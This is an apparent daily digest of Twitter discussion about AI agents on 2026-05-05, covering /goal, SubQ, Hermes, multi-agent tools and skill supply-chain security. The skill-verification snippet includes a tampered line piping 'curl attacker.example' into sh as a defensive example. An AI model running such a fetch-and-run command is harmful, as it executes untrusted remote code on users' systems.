Twitter AI Agent - 2026-05-05

1. What People Are Talking About

1.1 The /goal Command Redefines Multi-Day Agent Runs 🡕

The day's highest-scoring post came from @AlexFinn, who declared (349 likes, 38 replies, 424 bookmarks, 15209 views) that "/goal" is "the biggest advancement in AI coding this year" because "it allows your AI agent to quite literally work for days without stopping. You give a mission. It works until the mission is complete." The key insight from the thread: /goal is useless without a well-structured executive plan, which shifts the bottleneck from model capability to prompt architecture.

AlexFinn thread on /goal command showing how executive plans drive multi-day agent runs

@cheddarmandem surfaced (23 likes, 30 bookmarks, 828 views) the OpenAI cookbook article on executive plan templates that work with /goal, linking directly to developers.openai.com. @Dimillian wrote (105 likes, 129 bookmarks, 13827 views) a long reflection on compound engineering: "the tech stack matters as much as the method," arguing that the right harness + model pairing determines whether multi-day runs succeed or burn budget.

OpenAI executive plan templates for the /goal command

Comparison to prior day: May 4 focused on the build-vs-buy harness engineering debate and the AHE paper's automated harness evolution. May 5 shifts the conversation to a specific product feature (/goal) that embodies what harness engineering enables in practice -- continuous multi-day execution with structured planning.

Discussion insight: The replies reveal a tension between /goal's power and its dependency on "executive plans" -- essentially, the bottleneck has moved from coding to writing good plans for agents, creating demand for plan templates and structured prompt architectures.

1.2 SubQ Ships 12M Token Context, Declares RAG Dead 🡕

@KateMillerGems proclaimed (997 likes, 39 replies, 4 bookmarks, 115309 views): "RIP RAG pipelines. RIP chunking hacks. RIP summarisation loops. They were never clever engineering. They were apologies for a broken foundation. SubQ shipped 12M tokens of the working context. The workarounds are over." At roughly 115K views, it was the most-viewed AI-agent post of the day.

@alex_whedon announced (47 likes, 72 bookmarks, 9393 views) SubQ's early access alongside SubQ Code, their coding agent. @willdepue pushed back technically (59 likes, 8 bookmarks, 2523 views): "Can you clarify the approximate complexity of your method? Is it O(n), O(n log n), O(n^k < 2)? What's stopping you from demoing 100M, 1B, even 10B context if truly subquadratic?"

Comparison to prior day: May 4 featured context engineering gaining structured vocabulary with architecture diagrams and workbooks. May 5 escalates with SubQ's specific product claim of 12M working tokens, framing it as a replacement for entire categories of infrastructure (RAG, chunking, summarization) rather than an incremental improvement.

Discussion insight: The skepticism from @willdepue about computational complexity signals the community is not accepting the "RAG is dead" claim at face value -- demanding proof of scalability characteristics before declaring victory over established patterns.
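
To make @willdepue's question concrete, the sketch below compares how much more work a 100M-token context would need than a 12M-token one under each growth law he lists. It is illustrative arithmetic only: SubQ's actual method and complexity are not stated in the source, and the exponent k = 1.5 is an arbitrary stand-in for "O(n^k < 2)".

```python
import math


def relative_cost(n_from: int, n_to: int, kind: str, k: float = 1.5) -> float:
    """Return how many times more work n_to tokens need than n_from."""
    growth = {
        "linear": lambda n: n,                  # O(n)
        "nlogn": lambda n: n * math.log2(n),    # O(n log n)
        "power": lambda n: n ** k,              # O(n^k), k is an assumed value below 2
        "quadratic": lambda n: n ** 2,          # O(n^2), standard attention for reference
    }
    f = growth[kind]
    return f(n_to) / f(n_from)


base, target = 12_000_000, 100_000_000
for kind in ("linear", "nlogn", "power", "quadratic"):
    print(f"{kind:>9}: {relative_cost(base, target, kind):.1f}x more work")
```

Under linear scaling the jump from 12M to 100M costs about 8x more work, while quadratic scaling costs about 69x, which is why a demo at larger sizes would be informative evidence about the claimed complexity.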

1.3 Hermes + HyperFrames Creates the Agent Video Stack 🡕

The Hermes ecosystem's video capability became a major thread. @AndyMarlowg celebrated (49 likes, 40 bookmarks, 8618 views): "Hermes runs anywhere. HyperFrames renders anywhere. now they ship together -- this is the agent video stack I wanted. hermes skills install hyperframes." @dr_cintas explained (23 likes, 21 bookmarks, 3013 views) the mechanics: "Describe the video you want. Your agent writes the HTML. It renders to MP4. No editor. No timeline."

@_0xpainn pitched (30 likes, 8 bookmarks, 233 views) the broader self-improving angle: "A self improving AI agent that runs on a $5/month VPS costs $0 per task. Free to run. Free per task. Forever. Rent a VPS for $5. Install Ollama. One command to install Hermes. Done. It creates reusable skills from every task." @MystiqueMide tested (14 likes, 175 views) voice mode on Discord, continuing the multi-modal expansion.

Comparison to prior day: May 4 saw the Hermes ecosystem expanding through desktop apps, Shopify skills, and MMORPG plugins. May 5 adds a video creation pipeline (HyperFrames) and voice mode, completing Hermes's evolution from text-only agent into a full multi-modal automation platform.

Discussion insight: Replies from @Feel594326 and @yafadec815 highlight that the community values "portability" -- the ability to run the same agent stack anywhere without vendor lock-in is a key differentiator for Hermes over proprietary alternatives.

1.4 Multi-Agent Orchestration Tools Formalize 🡕

@geminicli announced Scion (144 likes, 112 bookmarks, 6132 views): "a new multi-agent orchestration tool that orchestrates agents (Claude Code, Gemini CLI, Codex, and others) as isolated, concurrent processes. Each agent gets its own container, git worktree, and credentials." @daytradingzoo showed (23 likes, 25 bookmarks, 1562 views) a practical two-agent setup: "Claude - frontend, Codex - backend. Handovers, second-opinion reviews, github for alignment."

Two-agent setup showing Claude handling frontend and Codex handling backend with GitHub for alignment

@om_patel5 described (5 likes, 2 bookmarks, 395 views) a novel pattern: "two developers and two Claude Codes in the same chat room -- all four talking. Two humans and two AI agents in one conversation planning a feature together." @aakashgupta reported (8 likes, 24 bookmarks, 2902 views): "A 21-agent team running 4 parallel sprints inside Claude Code shipped from idea to App Store submission."

Comparison to prior day: May 4 discussed multi-agent coordination complexity as a frustration point (running "5-7 agents directly all day feels timid"). May 5 shows the tooling catching up -- Scion provides formal container isolation, while practitioners share concrete multi-agent workflows they report using on real projects.
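
The worktree half of the isolation idea can be sketched with plain git. The helper below only builds one `git worktree add` command per agent and does not run anything. It is not Scion's implementation, which the source does not show: the `agent/<name>` branch naming and the sibling-directory layout are hypothetical choices, and containers and credentials are out of scope.

```python
from pathlib import Path


def worktree_commands(repo: Path, agents: list[str]) -> list[list[str]]:
    """Build one `git worktree add` command per agent (commands are not executed)."""
    cmds = []
    for name in agents:
        branch = f"agent/{name}"                   # hypothetical branch naming scheme
        path = repo.parent / f"{repo.name}-{name}"  # hypothetical sibling checkout directory
        cmds.append(
            ["git", "-C", str(repo), "worktree", "add", "-b", branch, str(path)]
        )
    return cmds


for cmd in worktree_commands(Path("/tmp/app"), ["claude", "codex"]):
    print(" ".join(cmd))
```

Each agent then edits its own checkout on its own branch, so concurrent runs do not overwrite each other's working files and merges happen through normal git review.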

Discussion insight: @om_patel5 raises a critical warning: "two AI models can make each other sound more confident and hallucinate while quietly drifting from what you actually asked for" -- suggesting that multi-agent setups need explicit decision logs and human checkpoints to prevent collective drift.

1.5 HeyGen Agent Saturates the Async Communication Niche 🡕

The HeyGen + Superhuman Go integration generated volume across 15+ posts. @viipin8 captured (91 likes, 14 bookmarks, 11197 views) the pitch: "most updates fail because they don't land the first time so they get repeated in threads, meetings, follow-ups. Superhuman Go + HeyGen Agent turning them into video/voice feels like a clean way to fix that." @Parul_Gautam7 added (46 likes, 10 bookmarks, 6849 views): "Typing updates -- ignored. Meetings -- overkill. Now you can just say it."

@Logical_Girll noted (31 likes, 6 bookmarks, 610 views): "feels like the start of agents living inside your tools, not beside them." The coordinated amplification pattern (15+ accounts quoting the same @HeyGen announcement) was similar to May 4's launch pattern but with higher sustained engagement.

Comparison to prior day: May 4 noted the HeyGen + Superhuman Go launch as a "New and Notable" signal. May 5 shows the integration saturating the discourse with organic rephrasing and adoption signals, suggesting it resonated beyond the initial launch coordination.

1.6 Agent Skill Verification and Supply Chain Security 🡒

@omarsar0 published two key threads. The first (21 likes, 34 bookmarks, 1703 views) covered skill verification: "If you ship agent skills, your runtime is treating signed-and-cleared skills as trusted by default. This paper argues a skill is untrusted code until it is verified." He called for "SKILL.md before agent skill libraries become the next attack surface."

Paper diagram showing skills as verifiable deployment artifacts requiring gated verification

His second thread (105 likes, 170 bookmarks, 7371 views) covered HeavySkill's agentic harness design: "They argue that what actually drives agent harness performance is not the orchestration code. It's a single inner skill: parallel reasoning."

HeavySkill paper showing that inner skill design, not orchestration code, drives harness performance

@yzg75001 replied: "i've been running agent skills in production and the trust model is basically vibes-based rn -- signed skill = trusted, which is wild. we need something like sigstore for agent skills."

Comparison to prior day: May 4 identified agent security gaps (morse code exploits, $200K drained). May 5 elevates the conversation from "agents get hacked" to "the skill distribution layer itself is an attack surface," with a published paper proposing formal verification and @omarsar0 framing it as a supply-chain problem.

Discussion insight: @DylSwanepoel's reply crystallizes the shift: "Agent skills are not just prompts or convenience wrappers. They are executable artifacts. Once a skill can touch tools, data, money, or production systems, trust cannot be implied by where it came from."
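
One simple way to express "untrusted until verified" is to pin the digest of each reviewed skill and refuse anything else. The sketch below uses that swapped-in technique (SHA-256 allowlisting); it is not the paper's verification method and not sigstore, and the skill contents and function names are hypothetical.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of the skill's exact bytes."""
    return hashlib.sha256(data).hexdigest()


def is_verified(skill_bytes: bytes, pinned_digests: set[str]) -> bool:
    """Treat a skill as untrusted unless its bytes match a reviewed digest."""
    return sha256_hex(skill_bytes) in pinned_digests


# Hypothetical skill file that a human has reviewed and pinned.
reviewed = b"name: hello\nsteps: [echo hi]\n"
allowlist = {sha256_hex(reviewed)}

tampered = reviewed + b"steps: [curl attacker.example | sh]\n"
print(is_verified(reviewed, allowlist))   # reviewed bytes match the pin
print(is_verified(tampered, allowlist))   # any change to the bytes breaks the match
```

Digest pinning only proves that the bytes are the ones somebody reviewed. It says nothing about who published them or whether the review was sound, which is the gap signing and attestation schemes aim to close.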

1.7 Enterprise Agent Governance Deepens: ServiceNow + Microsoft 🡒

@ServiceNowNews announced (47 likes, 8 bookmarks, 3570 views) that "ServiceNow + Microsoft are unifying agent governance across both platforms." AI Control Tower now extends governance to Microsoft Agent 365, giving teams "one place to discover, approve, and manage agents." @Sam_Badawi provided (66 likes, 2 bookmarks, 4463 views) financial context: "$NOW is integrating its AI Control Tower with $MSFT Agent 365, expanding governance and visibility across AI agents operating within both ecosystems."

@Arkive_live reported (12 likes, 2 bookmarks, 44 views): "An internal AI agent at Meta recently leaked restricted employee data and org charts. Even tech giants struggle with governance when AI steps beyond controlled environments."

Comparison to prior day: May 4 featured Microsoft Agent 365 going GA and DeepMind's agent attack taxonomy. May 5 deepens the enterprise governance narrative with ServiceNow's cross-platform integration announcement and a reported Meta data leak, reinforcing that governance is a live operational concern, not a theoretical one.

2. What Frustrates People

Token Cost and Optimization Complexity

@akshay_pachaar quantified (130 likes, 223 bookmarks, 24291 views) dramatic savings: "Claude Code used 3x fewer tokens with one change: Before: 10.4M tokens, 10 errors, $9.21. After: 3.7M tokens, 0 errors, $2.81." The fix was using "Insforge Skills + CLI as the backend context engineering layer" -- implying that out-of-the-box agent configurations burn money unnecessarily.
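
The quoted figures can be checked directly. The snippet below recomputes the ratios from the numbers in the post; nothing beyond those four values is assumed.

```python
# Figures as quoted in @akshay_pachaar's post.
before = {"tokens": 10_400_000, "cost_usd": 9.21}
after = {"tokens": 3_700_000, "cost_usd": 2.81}

token_ratio = before["tokens"] / after["tokens"]        # how many times fewer tokens
cost_ratio = before["cost_usd"] / after["cost_usd"]     # how many times cheaper
token_saving = 1 - after["tokens"] / before["tokens"]   # fraction of tokens saved

print(f"tokens: {token_ratio:.2f}x fewer ({token_saving:.0%} saved)")
print(f"cost:   {cost_ratio:.2f}x cheaper")
```

The headline "3x" is a rounding: the token count drops by about 2.8x (roughly 64% saved), while the dollar cost drops by about 3.3x.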

Multi-Agent Confidence Drift

@om_patel5 warned (5 likes, 2 bookmarks, 395 views) that in multi-agent setups "two AI models can make each other sound more confident and hallucinate while quietly drifting from what you actually asked for." The failure mode is subtle: each agent validates the other's output, creating a closed loop that looks correct but has departed from the original intent.
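
A decision log with forced human checkpoints is one way to break that closed loop. The sketch below is a minimal illustration, not a tool named in the source: the `DecisionLog` class and the "review every N decisions" policy are hypothetical, and the code does not detect drift itself. It only guarantees that a human compares the log with the original goal at a fixed cadence.

```python
from dataclasses import dataclass, field


@dataclass
class DecisionLog:
    goal: str                  # the original human request, never rewritten by agents
    checkpoint_every: int = 3  # hypothetical policy: review after this many decisions
    entries: list[tuple[str, str]] = field(default_factory=list)
    unreviewed: int = 0

    def record(self, agent: str, decision: str) -> bool:
        """Append a decision and return True when a human review is due."""
        self.entries.append((agent, decision))
        self.unreviewed += 1
        return self.unreviewed >= self.checkpoint_every

    def approve(self) -> None:
        """A human has compared the log against the goal; reset the counter."""
        self.unreviewed = 0


log = DecisionLog(goal="Add CSV export to the reports page", checkpoint_every=2)
log.record("claude", "Reuse the existing report query")
if log.record("codex", "Also add PDF export"):
    print(f"Review needed against goal: {log.goal}")
    for agent, decision in log.entries:
        print(f"  {agent}: {decision}")
```

In this example the second decision adds scope the goal never asked for, which is exactly the kind of quiet departure a reviewer reading the log next to the goal can catch.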

Skill Trust Model Is "Vibes-Based"

@yzg75001 admitted in a reply to @omarsar0: "i've been running agent skills in production and the trust model is basically vibes-based rn -- signed skill = trusted, which is wild. the supply chain attack vector is real." The gap between "shipped to marketplace" and "verified safe to execute" remains unresolved.

Demoware vs Production-Ready Agents

@databricks opened (53 likes, 18 bookmarks, 2717 views) with a blunt assessment: "Most 'agentic AI' is still demoware. Data work and coding are clear exceptions." @LandonExplr replied: "Agentic AI works where outputs are verifiable. Data pipelines qualify. Everything else claiming 'agentic' is still demoware."

3. What People Wish Existed

Inter-Agent Communication Pipes

@SaidAitmbarek described (12 likes, 1 bookmark, 206 views) his workflow of copying between ChatGPT and Codex and wished for: "a headless bridge (pipe) that streams data between agents (ad-hoc). Like OAuth, but for agents and with durable streams." The gap: no standard way for two agents from different providers to pass context back and forth in real time.

Skill Verification Infrastructure

@omarsar0 called for (21 likes, 34 bookmarks) "SKILL.md" -- a verification standard for agent skills similar to software supply chain attestation. @yzg75001 amplified: "we need something like sigstore for agent skills before someone ships a malicious skill that has write access to prod."

Context Scalability Proof Beyond 12M Tokens

@willdepue challenged (59 likes, 8 bookmarks) SubQ directly: "What's stopping you from demoing 100M, 1B, even 10B context if truly subquadratic?" The need: verifiable demonstration that long-context solutions actually scale, not just large-number claims without complexity analysis.

Agent-Native Permission and Identity Layers

@Arkive_live argued (12 likes) after the reported Meta leak: "Enterprises need intelligence layers with built-in permission boundaries and auditability from day one." The incident, as described, suggests that retrofitting governance onto existing agent deployments is risky.
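
As a rough illustration of what "permission boundaries and auditability from day one" could mean in code, the sketch below gates every resource read on an explicit allowlist and records each attempt, allowed or not. The `GuardedAgent` class and the resource names are hypothetical and do not correspond to any product mentioned here.

```python
from dataclasses import dataclass, field


@dataclass
class GuardedAgent:
    name: str
    allowed: frozenset[str]  # resources this agent may read
    audit: list[tuple[str, str, bool]] = field(default_factory=list)

    def read(self, resource: str) -> bool:
        """Check the permission boundary and log the attempt either way."""
        ok = resource in self.allowed
        self.audit.append((self.name, resource, ok))
        return ok


agent = GuardedAgent("hr-bot", frozenset({"handbook"}))
agent.read("handbook")    # inside the boundary
agent.read("org_chart")   # outside the boundary, denied but still logged
for entry in agent.audit:
    print(entry)
```

The design choice worth noting is that denied attempts are logged too, so an audit can show what an agent tried to reach and not only what it was given.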

4. Tools and Methods in Use

Tool	Category	Sentiment	Strengths	Limitations
Claude Code + /goal	Coding agent	Positive	Multi-day autonomous runs, executive plan structure, subagents	Requires carefully written plans; useless without good prompts
Hermes Agent	Agent framework	Positive	HyperFrames video, voice mode, $5/mo VPS deployment, 100+ skills, 17 platforms	New skill trust model unverified; ecosystem quality variance
Scion	Multi-agent orchestrator	Positive	Container isolation per agent, git worktree separation, concurrent processes	Brand new; limited production track record
SubQ	Long-context engine	Polarized	Claims 12M working tokens; eliminates RAG/chunking	Complexity unproven; no public demo at 100M+ scale
Insforge Skills	Context engineering	Positive	3x token reduction on Claude Code; zero errors vs 10 errors baseline	Requires CLI familiarity; new ecosystem
Genie Code (Databricks)	Data agent	Positive	4+ years of harness tuning; Spark Declarative Pipelines; natural language	Limited to data engineering domain
OpenClaw	Agent platform	Positive	13,700+ skills in marketplace; per-agent model selection	Running it yourself is "still a nightmare" (per @cyrilXBT)
AG-UI Protocol	Agent protocol	Positive	Adopted by Google, AWS, Microsoft, LangChain, Mastra, TanStack	Protocol not runtime; requires implementation
DeepSeek TUI	Terminal coding agent	Emerging	1M context, sub-agents, keyboard-driven, git management	Less ecosystem support than Claude/Codex
Flue	Agent harness	Positive	One-click Render deploy; drop .ts file in agents/	TypeScript only; early stage

The standout shift: the tools conversation has moved from "which model is best" to "which orchestration layer minimizes token spend while maximizing autonomous run duration." Insforge's 3x token reduction and /goal's multi-day execution represent the new performance frontier.

5. What People Are Building

Project	Who built it	What it does	Problem it solves	Stack	Stage	Links
Scion	@geminicli	Multi-agent orchestrator with container isolation	Agents sharing state/credentials create blast radius	Containers, git worktrees, Claude/Gemini/Codex	Shipped	post
HyperFrames Skill	@HeyGen + @NousResearch	One-line video rendering from Hermes agent	Agents cannot create video without external editors	Hermes skills, HTML-to-MP4	Shipped	post
Entire CLI Skills	@ashtom / @EntireHQ	Teaches agents to use full commit context (prompts, transcripts, decisions)	Agents lack access to reasoning behind code changes	Open source, session-handoff	Shipped	post
Autoresearch v2	@AndrewK404	Long optimization runs with memory, async experiments, falsifiers	Karpathy's PoC lacks honesty enforcement in long runs	Agent swarm, memory layer	Shipped	post
AgenC Marketplace	@tetsuoarena	On-chain agent task marketplace across Claude/Codex/Hermes/MCP	Wallet authority mixed with untrusted task text	Solana, MCP, multiple agent CLIs	Devnet	post
AutoSwarm	@artemg314	Auto-optimizes entire multi-agent pipeline (30% to 90% on Terminal-Bench)	Individual agent optimization ignores team dynamics	Meta-agent, Terminal-Bench	Shipped	post
DAEMON Terminal	@DaemonTerminal	Agent IDE with local LLM, plugin marketplace, team workspaces	Fragmented agent tools, no collaboration	Ollama, LM Studio, plugins	Roadmap	post
Odysseus (VLM Gaming Agent)	@sethkarten	Finetuning VLMs to beat Mario via PPO reinforcement learning	Gaming agents lack reactive spatial reasoning	VLMs, PPO, Super Mario Land	Research	post
oh-my-agent-skills	@GT_Chiang	14 skills across 6 bundles -- execution logic for agent failure recovery	Agents fail without structured recovery paths	Skills SDK	Shipped	post
PEPT://BASE Hermes Skill	@peptbase	Structured peptide intelligence for biotech agent workflows	No agent-native peptide knowledge access	Hermes skills, 100+ peptides	Shipped	post
Obsidian Vault for Agent Memory	@tom_doerr	Persistent knowledge base accessible to coding agents	Agents lose context between sessions	Obsidian, agent integration	Shipped	post

6. New and Notable

Coinbase Cuts 14% and Mandates AI-Native Pods

@rohanpaul_ai analyzed (6 likes, 4 bookmarks, 2272 views) Brian Armstrong's memo announcing 14% layoffs plus "one-person teams" where engineers, designers, and PMs merge into single roles augmented by agent fleets. The framing: "AI has changed the smallest useful unit of software work from a team to a single high-context operator." This appears to be one of the first cases of a major public company explicitly restructuring around agent capabilities rather than simply adding AI tooling.

Grok Build and Grok Terminal Enter the Coding Agent Race

@MarioNawfal reported (141 likes, 16 bookmarks, 33142 views): "Grok is done being just a chatbot. xAI is dropping Grok Build, a full coding agent, and Grok Terminal, straight from your command line." @testerlabor added (14 likes) that 3 Grok Build models are training simultaneously. The coding agent market gains another well-funded competitor.

xAI Launches Custom Voice Cloning for Agent APIs

@AlternativeTo reported (9 likes, 3 bookmarks, 1302 views) that xAI launched Custom Voices: "clone and deploy voices for Grok text-to-speech, apps, and Voice Agent APIs in under two minutes, with multilingual support." This lowers the barrier for voice agent personalization significantly.

TradingAgents Tops GitHub Finance Repos

@quantscience_ listed (72 likes, 121 bookmarks, 3521 views) the fastest growing GitHub finance repos: "TradingAgents (+7.9K stars) -- multi-agent LLM trading framework from UCLA/MIT with fundamental analyst, sentiment analyst, technicals, risk manager with DeepSeek V4 thinking."

GitHub trending finance repos showing TradingAgents at +7.9K stars

Ctx2Skill: Self-Evolving Skills via Multi-Agent Self-Play

@HuggingPapers shared (43 likes, 33 bookmarks, 2062 views) a new framework that "autonomously discovers skills from complex contexts through multi-agent self-play. No human labels or external feedback needed." Result: GPT-4.1 solve rates improved from 11.1% to 16.5% on CL-bench.

Ctx2Skill framework diagram showing multi-agent self-play skill discovery
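
The reported CL-bench result reads differently in absolute and relative terms. The short calculation below uses only the two solve rates quoted above.

```python
baseline, improved = 11.1, 16.5  # solve rates in percent, as quoted in the post

absolute_gain = improved - baseline       # percentage points
relative_gain = absolute_gain / baseline  # fraction of the baseline rate

print(f"+{absolute_gain:.1f} points, {relative_gain:.1%} relative improvement")
```

That is a gain of about 5.4 percentage points, or roughly 49% relative to the baseline, on a benchmark where the improved model still solves fewer than one task in five.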

7. Where the Opportunities Are

[+++] Agent skill verification and supply chain security. @omarsar0's "SKILL.md" framing, @yzg75001's admission that production trust is "vibes-based," and 13,700+ skills in OpenClaw's marketplace converge on a clear gap: no sigstore-equivalent for agent skills exists. Whoever builds verified skill attestation captures the trust layer as skill marketplaces scale.

[+++] Context engineering that eliminates token waste. @akshay_pachaar demonstrated 3x token reduction (10.4M to 3.7M) with zero errors via Insforge Skills. SubQ claims 12M tokens of working context. The pattern: context engineering layers that sit between the user and the model, structuring information to minimize redundant reasoning, represent the fastest-growing value capture point.

[++] Multi-agent orchestration with drift detection. Scion ships container isolation. @om_patel5 identifies confidence drift. @artemg314's AutoSwarm lifts multi-agent pipelines from 30% to 90%. The gap between "agents running in parallel" and "agents running in alignment" creates opportunity for coordination tools with built-in divergence detection.

[++] Agent-native video and voice production. HyperFrames + Hermes, HeyGen + Superhuman Go, xAI Custom Voices, and Deepgram + Together all surfaced within a two-day window. The convergence signals that multi-modal agent output (not just text) is becoming table stakes, with opportunities in quality control, brand consistency, and automated editing.

[+] One-person team infrastructure. Coinbase's restructuring around "one-person teams" and @code_rams's "3-agent solo founder stack" both point to infrastructure that enables a single operator to manage agent fleets across research, content, and operations. Tools that make this pattern reliable (monitoring, handoffs, quality gates) have growing demand.

[+] Decentralized agent work marketplaces. AgenC, ShelleyBay, GenLayer, and Handshake trading skills all represent independent attempts at on-chain agent task marketplaces. The pattern is validated across multiple teams; execution and trust infrastructure will determine winners.

8. Takeaways

The /goal command makes "executive plan" quality the new bottleneck. @AlexFinn's 2577-score post, with 424 bookmarks, suggests the community recognizes that multi-day agent runs are possible but depend entirely on structured planning documents -- shifting the premium skill from "write good code" to "write good plans for agents." (source)
Context engineering is delivering measurable savings of roughly 3x today. @akshay_pachaar's before/after (10.4M tokens/$9.21 vs 3.7M tokens/$2.81, about 2.8x fewer tokens and 3.3x lower cost) with zero errors shows that context engineering layers are not theoretical -- in at least this reported case they produced immediate, quantifiable savings. (source)
The skill ecosystem has outgrown its trust infrastructure. With 13,700+ skills in OpenClaw, HyperFrames shipping for Hermes, and practitioners admitting trust is "vibes-based," the agent skill layer is scaling distribution faster than verification. The supply-chain security framing from @omarsar0 is the early warning before the first major skill-based exploit. (source)
Multi-agent orchestration moved from concept to containerized product. Scion's container isolation per agent, @daytradingzoo's frontend/backend split, and @om_patel5's "4-person team" (2 humans + 2 Claudes) all demonstrate that multi-agent is now a practical workflow pattern, not a research curiosity -- but drift detection remains unsolved. (source)
Coinbase's 14% cut signals that "AI-native org structure" is now a public-company operating thesis. One-person teams, flattened hierarchies, and agent fleets are no longer blog posts -- they are driving layoff decisions at a $60B+ company. This will accelerate enterprise demand for agent management and governance tooling. (source)
The agent video and voice stack converged within days. HyperFrames, xAI Custom Voices, and Deepgram STT on Together all surfaced on May 5, a day after the HeyGen + Superhuman Go launch was first noted. Agents are no longer text-in/text-out -- multi-modal output is becoming a default capability, collapsing previously separate tool categories into single-skill installs. (source)